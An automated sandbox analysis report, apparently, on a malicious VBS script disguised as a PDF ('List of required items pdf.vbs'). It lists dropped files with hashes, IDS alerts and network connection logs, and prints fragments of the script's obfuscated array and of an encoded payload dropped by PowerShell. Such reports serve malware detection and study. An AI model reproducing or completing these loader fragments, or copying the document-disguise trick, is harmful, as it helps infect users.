                                                                                                      Entropy (8bit):1.5231029153786204
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:WH25nJFV:WH2/
                                                                                                      MD5:FB5ABAA34A0BB284B640327B9745AAAC
                                                                                                      SHA1:7E1063A0F1DE0E83424399F104C1D3752BFAECDE
                                                                                                      SHA-256:12464C713EE2E0CBBDCF98FACF8AC034D34A9F4D221D7BB7A5C7D458AAEC0AF9
                                                                                                      SHA-512:0FB235A4475D72D9BB6A195F6DFE471152B91F6DE0967D4174298D0A3C228BFF0ED57F0A5F388833A7793BD90F6CA0D5A974D21D795938D8D96C079AB5D99294
                                                                                                      Malicious:false
                                                                                                      Preview:.user ..h.u.b.e.r.t. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                      Process:C:\Windows\System32\wscript.exe
                                                                                                      File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                                                                      Category:dropped
                                                                                                      Size (bytes):71954
                                                                                                      Entropy (8bit):7.996617769952133
                                                                                                      Encrypted:true
                                                                                                      SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                                                                                      MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                                                                                      SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                                                                                      SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                                                                                      SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                                                                                      Malicious:false
                                                                                                      Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...
                                                                                                      Process:C:\Windows\System32\wscript.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):328
                                                                                                      Entropy (8bit):3.2418003062782916
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:6:kK0AL9UswD8HGsL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:MZDImsLNkPlE99SNxAhUe/3
                                                                                                      MD5:1E4614429E815B74AF9517AC23AB6902
                                                                                                      SHA1:F8976FCC7B11BEDB32B1ACDC1458AD9DCFF2160D
                                                                                                      SHA-256:AC7684911109CC3C4A1FFB1B23D625973CD6A918DFC22B7F304E34D97CA3A534
                                                                                                      SHA-512:CF3AFF51ED35A7C1BF08FE7C9625EDFF997C848EFB94BF8F1B78334DE4D0BDCAEC92F86CF46830F74F7D561A119456849FC3951E0D5F4C0AE236AF3AFD159214
                                                                                                      Malicious:false
                                                                                                      Preview:p...... ........+..8J..(....................................................... ........G..@.......&......X........h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...
                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):11608
                                                                                                      Entropy (8bit):4.8908305915084105
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:192:yVsm5eml2ib4LxoeRm3YrKkzYFQ9smKp5pVFn3eGOVpN6K3bkkjo5xgkjDt4iWNH:yCib4PYbLVoGIpN6KQkj2qkjh4iUx6iP
                                                                                                      MD5:FE1902820A1CE8BD18FD85043C4D9C5C
                                                                                                      SHA1:62F24EAE4A42BA3AE454A6FAB07EF47D1FE9DFD6
                                                                                                      SHA-256:8BBDC66564B509C80EA7BE85EA9632ACD0958008624B829EA4A24895CA73D994
                                                                                                      SHA-512:8D1BADE448F0C53D6EC00BC9FACDBCB1D4B1B7C61E91855206A08BDBF61C6E4A40210574C4193463C8A13AE692DD80897F3CE9E39958472705CF17D77FE9C1D9
                                                                                                      Malicious:false
                                                                                                      Preview:PSMODULECACHE.....$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module........Find-Command........Unregister-PSRepository........Get-InstalledScript........Get-DynamicOptions........Add-PackageSource........Register-PSRepository........Find-DscResource........Publish-Script........Find-RoleCapability........Uninstall-Package........Get-PackageDependencies........pumo........fimo........Find-Script........Initialize-Provider........Get-PackageProviderName........Test-ScriptFileInfo........Get-InstalledModule........Update-ScriptFileInfo........Get-InstalledPackage........Resolve-PackageSource........Uninstall-Module........inmo........Remove-PackageSource........Update-Script........Uninstall-Script........Update-ModuleManifest........Get-Feature........Install-Module........Install-Package........New-ScriptFileInfo...
                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):64
                                                                                                      Entropy (8bit):1.1940658735648508
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:NlllulDm0ll//Z:NllU6cl/
                                                                                                      MD5:DA1F22117B9766A1F0220503765A5BA5
                                                                                                      SHA1:D35597157EFE03AA1A88C1834DF8040B3DD3F3CB
                                                                                                      SHA-256:BD022BFCBE39B4DA088DDE302258AE375AAFD6BDA4C7B39A97D80C8F92981C69
                                                                                                      SHA-512:520FA7879AB2A00C86D9982BB057E7D5E243F7FC15A12BA1C823901DC582D2444C76534E955413B0310B9EBD043400907FD412B88927DAD07A1278D3B667E3D9
                                                                                                      Malicious:false
                                                                                                      Preview:@...e.................................R..............@..........
                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):60
                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                      Malicious:false
                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):60
                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                      Malicious:false
                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):60
                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                      Malicious:false
                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):60
                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                      Malicious:false
                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):60
                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                      Malicious:false
                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):60
                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                      Malicious:false
                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):439600
                                                                                                      Entropy (8bit):5.9526236940028125
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:6144:la+3GgdfLk97Dj0C0qyHZKu3mz+cpMcGAbovF83nbyXMkAP2JLvwQOKtaUOhh:laqLkxj/0qOZKtiyLK3LinRhh
                                                                                                      MD5:DBC57B25AD339954CEB6C4FED816E2A1
                                                                                                      SHA1:DFDA4C0606842ED2A9D4C46E5B25FB3D23764787
                                                                                                      SHA-256:5F7AD2BAFBD491F7CD57D84B036CFA1A4DC1875FF66904FABB6DEE7FCD99A7A8
                                                                                                      SHA-512:74134DBE583197813697DCB19CA5D828288738D4D8CCD28FA8637436278ECF19F243963C2B5145A660A949CE4D470FBB8CB0BF088360262B575A39FBD6C2872D
                                                                                                      Malicious:false
                                                                                                      Preview:cQGbcQGbu+2RHADrAl+X6wKFwwNcJARxAZtxAZu5zSkuVHEBm+sCUJ+B8X9sjGLrAsgUcQGbgcFOul3JcQGb6wJQpXEBm3EBm7p6wSmYcQGbcQGbcQGb6wKODDHK6wImUOsCzH2JFAvrAjPlcQGb0eLrAvaQcQGbg8EEcQGb6wL4HIH506BEA3zK6wJlResCIRmLRCQEcQGb6wL/E4nDcQGbcQGbgcPTDMEBcQGbcQGburRrSEJxAZtxAZuBwi5HYeHrAh9J6wKijYHq4rKpI3EBm+sC0nXrAq1b6wKNR+sCEqTrAvE0iwwQ6wIfXusCil6JDBNxAZvrAkR3QusCht7rAnE4gfq8mgQAddJxAZtxAZuJXCQM6wJ8Y3EBm4HtAAMAAOsCeGJxAZuLVCQIcQGbcQGbi3wkBHEBm+sCyPOJ63EBm3EBm4HDnAAAAHEBm+sCGQ1T6wKCl3EBm2pAcQGb6wJ8qonr6wIw6esCyRzHgwABAAAAQGQD6wLruusClY2BwwABAABxAZvrAsKZU3EBm3EBm4nr6wJq6XEBm4m7BAEAAHEBm+sCvWaBwwQBAABxAZvrAiP0U+sCFsBxAZtq/3EBm+sCUziDwgVxAZvrAvOgMfbrArpt6wK6yzHJ6wKfu3EBm4sacQGb6wJZFkHrAlFN6wJhoTkcCnXycQGbcQGbRusCD6FxAZuAfAr7uHXdcQGbcQGbi0QK/OsCrcFxAZsp8HEBm+sCEV7/0usCzXpxAZu6vJoEAOsCk2nrAlwOMcBxAZvrAhY8i3wkDHEBm+sCsPOBNAcpkn0hcQGb6wJ+AoPABHEBm3EBmznQdeVxAZvrAuh9ifvrAqmK6wKZHv/XcQGb6wK79cGSfSEpyUXyoHe6ZIlUGOIuEwiBRpWLaqjn3UJyZPCgXDK3G+pTMd5kMgjbfBauqMwrFe9UMPzQJVtBC6hjT9gfI4vgF/RE4KhTvyChVBvW7qjdGc9VOSwpCeQWGxM5LClY
                                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                                      File Type:JSON data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):55
                                                                                                      Entropy (8bit):4.306461250274409
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                      MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                      SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                      SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                      SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                      Malicious:false
                                                                                                      Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                                                      File type:ASCII text, with very long lines (2777), with CRLF line terminators
                                                                                                      Entropy (8bit):3.4877578001886174
                                                                                                      TrID:
                                                                                                        File name:List of required items pdf.vbs
                                                                                                        File size:3'021 bytes
                                                                                                        MD5:1fee8d135b538567e24faa39b34f0f29
                                                                                                        SHA1:7fb4d867634326ceac236efdc53a254950ff7890
                                                                                                        SHA256:9518df13e375c4e3926979ddda32a1a11b94eb928364f9b45f35970ac82ee6e2
                                                                                                        SHA512:0814b7d349c0a6fe556122fcceadb5e10396af8687d6e46de2e4f760fb414af7373e8aed3657c01d2d2b64bd15f58c854d5d9ae72491314d7ca28d5a0314dc2b
                                                                                                        SSDEEP:48:cP49pYOeQgOFQgOH9hfU950t9WDyXaqauF9ZZiq+yXRLcubEF9ZZiQ5Q1PgjE:LxKLJZLvgZPGKE
                                                                                                        TLSH:505177BF0F45C6CE4ACB5808503475E6DFC00A774B3E65AD6E2378E25D7A06A7496CC8
                                                                                                        File Content Preview:ov3jzpa20 = Array(1190, 1237, 1224, 1220, 1239, 1224, 1202, 1221, 1229, 1224, 1222, 1239, 1163, 1157, 1210, 1206, 1222, 1237, 1228, 1235, 1239, 1169, 1206, 1227, 1224, 1231, 1231, 1157, 1164, 1169, 1205, 1240, 1233, 1155, 1157, 1235, 1234, 1242, 1224, 123
                                                                                                        Icon Hash:68d69b8f86ab9a86
                                                                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                        2024-12-09T13:48:52.651272+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.84971652.113.195.132443TCP
                                                                                                        2024-12-09T13:49:53.934010+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.84977813.107.246.63443TCP
                                                                                                        2024-12-09T13:50:03.202315+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.84980113.107.246.63443TCP
                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                        Dec 9, 2024 13:48:15.351989031 CET49705443192.168.2.8107.161.23.150
                                                                                                        Dec 9, 2024 13:48:15.352031946 CET44349705107.161.23.150192.168.2.8
                                                                                                        Dec 9, 2024 13:48:15.352102995 CET49705443192.168.2.8107.161.23.150
                                                                                                        Dec 9, 2024 13:48:15.361866951 CET49705443192.168.2.8107.161.23.150
                                                                                                        Dec 9, 2024 13:48:15.361887932 CET44349705107.161.23.150192.168.2.8
                                                                                                        Dec 9, 2024 13:48:16.612386942 CET44349705107.161.23.150192.168.2.8
                                                                                                        Dec 9, 2024 13:48:16.612499952 CET49705443192.168.2.8107.161.23.150
                                                                                                        Dec 9, 2024 13:48:16.616506100 CET49705443192.168.2.8107.161.23.150
                                                                                                        Dec 9, 2024 13:48:16.616518021 CET44349705107.161.23.150192.168.2.8
                                                                                                        Dec 9, 2024 13:48:16.616847038 CET44349705107.161.23.150192.168.2.8
                                                                                                        Dec 9, 2024 13:48:16.628894091 CET49705443192.168.2.8107.161.23.150
                                                                                                        Dec 9, 2024 13:48:16.671334028 CET44349705107.161.23.150192.168.2.8
                                                                                                        Dec 9, 2024 13:48:17.053144932 CET44349705107.161.23.150192.168.2.8
                                                                                                        Dec 9, 2024 13:48:17.102873087 CET49705443192.168.2.8107.161.23.150
                                                                                                        Dec 9, 2024 13:48:17.102906942 CET44349705107.161.23.150192.168.2.8
                                                                                                        Dec 9, 2024 13:48:17.149736881 CET49705443192.168.2.8107.161.23.150
                                                                                                        Dec 9, 2024 13:48:17.172772884 CET44349705107.161.23.150192.168.2.8
                                                                                                        Dec 9, 2024 13:48:17.172791004 CET44349705107.161.23.150192.168.2.8
                                                                                                        Dec 9, 2024 13:48:17.172808886 CET44349705107.161.23.150192.168.2.8
                                                                                                        Dec 9, 2024 13:48:17.172816038 CET44349705107.161.23.150192.168.2.8
                                                                                                        Dec 9, 2024 13:48:17.172853947 CET44349705107.161.23.150192.168.2.8
                                                                                                        Dec 9, 2024 13:48:17.172910929 CET49705443192.168.2.8107.161.23.150
                                                                                                        Dec 9, 2024 13:48:17.172926903 CET44349705107.161.23.150192.168.2.8
                                                                                                        Dec 9, 2024 13:48:17.172965050 CET49705443192.168.2.8107.161.23.150
                                                                                                        Dec 9, 2024 13:48:17.227889061 CET49705443192.168.2.8107.161.23.150
                                                                                                        Dec 9, 2024 13:48:17.271553040 CET44349705107.161.23.150192.168.2.8
                                                                                                        Dec 9, 2024 13:48:17.271565914 CET44349705107.161.23.150192.168.2.8
                                                                                                        Dec 9, 2024 13:48:17.271584988 CET44349705107.161.23.150192.168.2.8
                                                                                                        Dec 9, 2024 13:48:17.271593094 CET44349705107.161.23.150192.168.2.8
                                                                                                        Dec 9, 2024 13:48:17.271620035 CET44349705107.161.23.150192.168.2.8
                                                                                                        Dec 9, 2024 13:48:17.271650076 CET49705443192.168.2.8107.161.23.150
                                                                                                        Dec 9, 2024 13:48:17.271714926 CET49705443192.168.2.8107.161.23.150
                                                                                                        Dec 9, 2024 13:48:17.279495955 CET44349705107.161.23.150192.168.2.8
                                                                                                        Dec 9, 2024 13:48:17.279555082 CET44349705107.161.23.150192.168.2.8
                                                                                                        Dec 9, 2024 13:48:17.279608965 CET49705443192.168.2.8107.161.23.150
                                                                                                        Dec 9, 2024 13:48:17.357274055 CET49705443192.168.2.8107.161.23.150
                                                                                                        Dec 9, 2024 13:48:24.571576118 CET49707443192.168.2.8209.124.66.28
                                                                                                        Dec 9, 2024 13:48:24.571634054 CET44349707209.124.66.28192.168.2.8
                                                                                                        Dec 9, 2024 13:48:24.571705103 CET49707443192.168.2.8209.124.66.28
                                                                                                        Dec 9, 2024 13:48:24.574459076 CET49707443192.168.2.8209.124.66.28
                                                                                                        Dec 9, 2024 13:48:24.574486971 CET44349707209.124.66.28192.168.2.8
                                                                                                        Dec 9, 2024 13:48:25.935906887 CET44349707209.124.66.28192.168.2.8
                                                                                                        Dec 9, 2024 13:48:25.936007977 CET49707443192.168.2.8209.124.66.28
                                                                                                        Dec 9, 2024 13:48:25.941694021 CET49707443192.168.2.8209.124.66.28
                                                                                                        Dec 9, 2024 13:48:25.941730022 CET44349707209.124.66.28192.168.2.8
                                                                                                        Dec 9, 2024 13:48:25.942070961 CET44349707209.124.66.28192.168.2.8
                                                                                                        Dec 9, 2024 13:48:25.987799883 CET49707443192.168.2.8209.124.66.28
                                                                                                        Dec 9, 2024 13:48:26.051999092 CET49707443192.168.2.8209.124.66.28
                                                                                                        Dec 9, 2024 13:48:26.099328995 CET44349707209.124.66.28192.168.2.8
                                                                                                        Dec 9, 2024 13:48:26.440768957 CET44349707209.124.66.28192.168.2.8
                                                                                                        Dec 9, 2024 13:48:26.493495941 CET49707443192.168.2.8209.124.66.28
                                                                                                        Dec 9, 2024 13:48:26.632982016 CET44349707209.124.66.28192.168.2.8
                                                                                                        Dec 9, 2024 13:48:26.632996082 CET44349707209.124.66.28192.168.2.8
                                                                                                        Dec 9, 2024 13:48:26.633013010 CET44349707209.124.66.28192.168.2.8
                                                                                                        Dec 9, 2024 13:48:26.633019924 CET44349707209.124.66.28192.168.2.8
                                                                                                        Dec 9, 2024 13:48:26.633049011 CET49707443192.168.2.8209.124.66.28
                                                                                                        Dec 9, 2024 13:48:26.633049965 CET44349707209.124.66.28192.168.2.8
                                                                                                        Dec 9, 2024 13:48:26.633079052 CET44349707209.124.66.28192.168.2.8
                                                                                                        Dec 9, 2024 13:48:26.633089066 CET49707443192.168.2.8209.124.66.28
                                                                                                        Dec 9, 2024 13:48:26.633141994 CET49707443192.168.2.8209.124.66.28
                                                                                                        Dec 9, 2024 13:48:26.679527044 CET44349707209.124.66.28192.168.2.8
                                                                                                        Dec 9, 2024 13:48:26.679536104 CET44349707209.124.66.28192.168.2.8
                                                                                                        Dec 9, 2024 13:48:26.679568052 CET44349707209.124.66.28192.168.2.8
                                                                                                        Dec 9, 2024 13:48:26.679591894 CET49707443192.168.2.8209.124.66.28
                                                                                                        Dec 9, 2024 13:48:26.679646015 CET49707443192.168.2.8209.124.66.28
                                                                                                        Dec 9, 2024 13:48:26.679655075 CET44349707209.124.66.28192.168.2.8
                                                                                                        Dec 9, 2024 13:48:26.679691076 CET49707443192.168.2.8209.124.66.28
                                                                                                        Dec 9, 2024 13:48:26.824750900 CET44349707209.124.66.28192.168.2.8
                                                                                                        Dec 9, 2024 13:48:26.824784994 CET44349707209.124.66.28192.168.2.8
                                                                                                        Dec 9, 2024 13:48:26.824836969 CET49707443192.168.2.8209.124.66.28
                                                                                                        Dec 9, 2024 13:48:26.824860096 CET44349707209.124.66.28192.168.2.8
                                                                                                        Dec 9, 2024 13:48:26.824888945 CET49707443192.168.2.8209.124.66.28
                                                                                                        Dec 9, 2024 13:48:26.824909925 CET49707443192.168.2.8209.124.66.28
                                                                                                        Dec 9, 2024 13:48:26.855348110 CET44349707209.124.66.28192.168.2.8
                                                                                                        Dec 9, 2024 13:48:26.855371952 CET44349707209.124.66.28192.168.2.8
                                                                                                        Dec 9, 2024 13:48:26.855426073 CET49707443192.168.2.8209.124.66.28
                                                                                                        Dec 9, 2024 13:48:26.855447054 CET44349707209.124.66.28192.168.2.8
                                                                                                        Dec 9, 2024 13:48:26.855472088 CET49707443192.168.2.8209.124.66.28
                                                                                                        Dec 9, 2024 13:48:26.855492115 CET49707443192.168.2.8209.124.66.28
                                                                                                        Dec 9, 2024 13:48:26.880528927 CET44349707209.124.66.28192.168.2.8
                                                                                                        Dec 9, 2024 13:48:26.880559921 CET44349707209.124.66.28192.168.2.8
                                                                                                        Dec 9, 2024 13:48:26.880599022 CET49707443192.168.2.8209.124.66.28
                                                                                                        Dec 9, 2024 13:48:26.880620956 CET44349707209.124.66.28192.168.2.8
                                                                                                        Dec 9, 2024 13:48:26.880651951 CET49707443192.168.2.8209.124.66.28
                                                                                                        Dec 9, 2024 13:48:26.880667925 CET49707443192.168.2.8209.124.66.28
                                                                                                        Dec 9, 2024 13:48:26.909634113 CET44349707209.124.66.28192.168.2.8
                                                                                                        Dec 9, 2024 13:48:26.909655094 CET44349707209.124.66.28192.168.2.8
                                                                                                        Dec 9, 2024 13:48:26.909710884 CET49707443192.168.2.8209.124.66.28
                                                                                                        Dec 9, 2024 13:48:26.909727097 CET44349707209.124.66.28192.168.2.8
                                                                                                        Dec 9, 2024 13:48:26.909763098 CET49707443192.168.2.8209.124.66.28
                                                                                                        Dec 9, 2024 13:48:26.909773111 CET49707443192.168.2.8209.124.66.28
                                                                                                        Dec 9, 2024 13:48:27.021320105 CET44349707209.124.66.28192.168.2.8
                                                                                                        Dec 9, 2024 13:48:27.021348000 CET44349707209.124.66.28192.168.2.8
                                                                                                        Dec 9, 2024 13:48:27.021419048 CET49707443192.168.2.8209.124.66.28
                                                                                                        Dec 9, 2024 13:48:27.021440983 CET44349707209.124.66.28192.168.2.8
                                                                                                        Dec 9, 2024 13:48:27.021485090 CET49707443192.168.2.8209.124.66.28
                                                                                                        Dec 9, 2024 13:48:27.041026115 CET44349707209.124.66.28192.168.2.8
                                                                                                        Dec 9, 2024 13:48:27.041045904 CET44349707209.124.66.28192.168.2.8
                                                                                                        Dec 9, 2024 13:48:27.041096926 CET49707443192.168.2.8209.124.66.28
                                                                                                        Dec 9, 2024 13:48:27.041135073 CET44349707209.124.66.28192.168.2.8
                                                                                                        Dec 9, 2024 13:48:27.041155100 CET49707443192.168.2.8209.124.66.28
                                                                                                        Dec 9, 2024 13:48:27.041172981 CET49707443192.168.2.8209.124.66.28
                                                                                                        Dec 9, 2024 13:48:27.060161114 CET44349707209.124.66.28192.168.2.8
                                                                                                        Dec 9, 2024 13:48:27.060189962 CET44349707209.124.66.28192.168.2.8
                                                                                                        Dec 9, 2024 13:48:27.060234070 CET49707443192.168.2.8209.124.66.28
                                                                                                        Dec 9, 2024 13:48:27.060267925 CET44349707209.124.66.28192.168.2.8
                                                                                                        Dec 9, 2024 13:48:27.060285091 CET49707443192.168.2.8209.124.66.28
                                                                                                        Dec 9, 2024 13:48:27.060306072 CET49707443192.168.2.8209.124.66.28
                                                                                                        Dec 9, 2024 13:48:27.076417923 CET44349707209.124.66.28192.168.2.8
                                                                                                        Dec 9, 2024 13:48:27.076438904 CET44349707209.124.66.28192.168.2.8
                                                                                                        Dec 9, 2024 13:48:27.076491117 CET49707443192.168.2.8209.124.66.28
                                                                                                        Dec 9, 2024 13:48:27.076519966 CET44349707209.124.66.28192.168.2.8
                                                                                                        Dec 9, 2024 13:48:27.076536894 CET49707443192.168.2.8209.124.66.28
                                                                                                        Dec 9, 2024 13:48:27.076571941 CET49707443192.168.2.8209.124.66.28
                                                                                                        Dec 9, 2024 13:48:27.097243071 CET44349707209.124.66.28192.168.2.8
                                                                                                        Dec 9, 2024 13:48:27.097268105 CET44349707209.124.66.28192.168.2.8
                                                                                                        Dec 9, 2024 13:48:27.097318888 CET49707443192.168.2.8209.124.66.28
                                                                                                        Dec 9, 2024 13:48:27.097330093 CET44349707209.124.66.28192.168.2.8
                                                                                                        Dec 9, 2024 13:48:27.097357988 CET49707443192.168.2.8209.124.66.28
                                                                                                        Dec 9, 2024 13:48:27.097378016 CET49707443192.168.2.8209.124.66.28
                                                                                                        Dec 9, 2024 13:48:27.116183043 CET44349707209.124.66.28192.168.2.8
                                                                                                        Dec 9, 2024 13:48:27.116209030 CET44349707209.124.66.28192.168.2.8
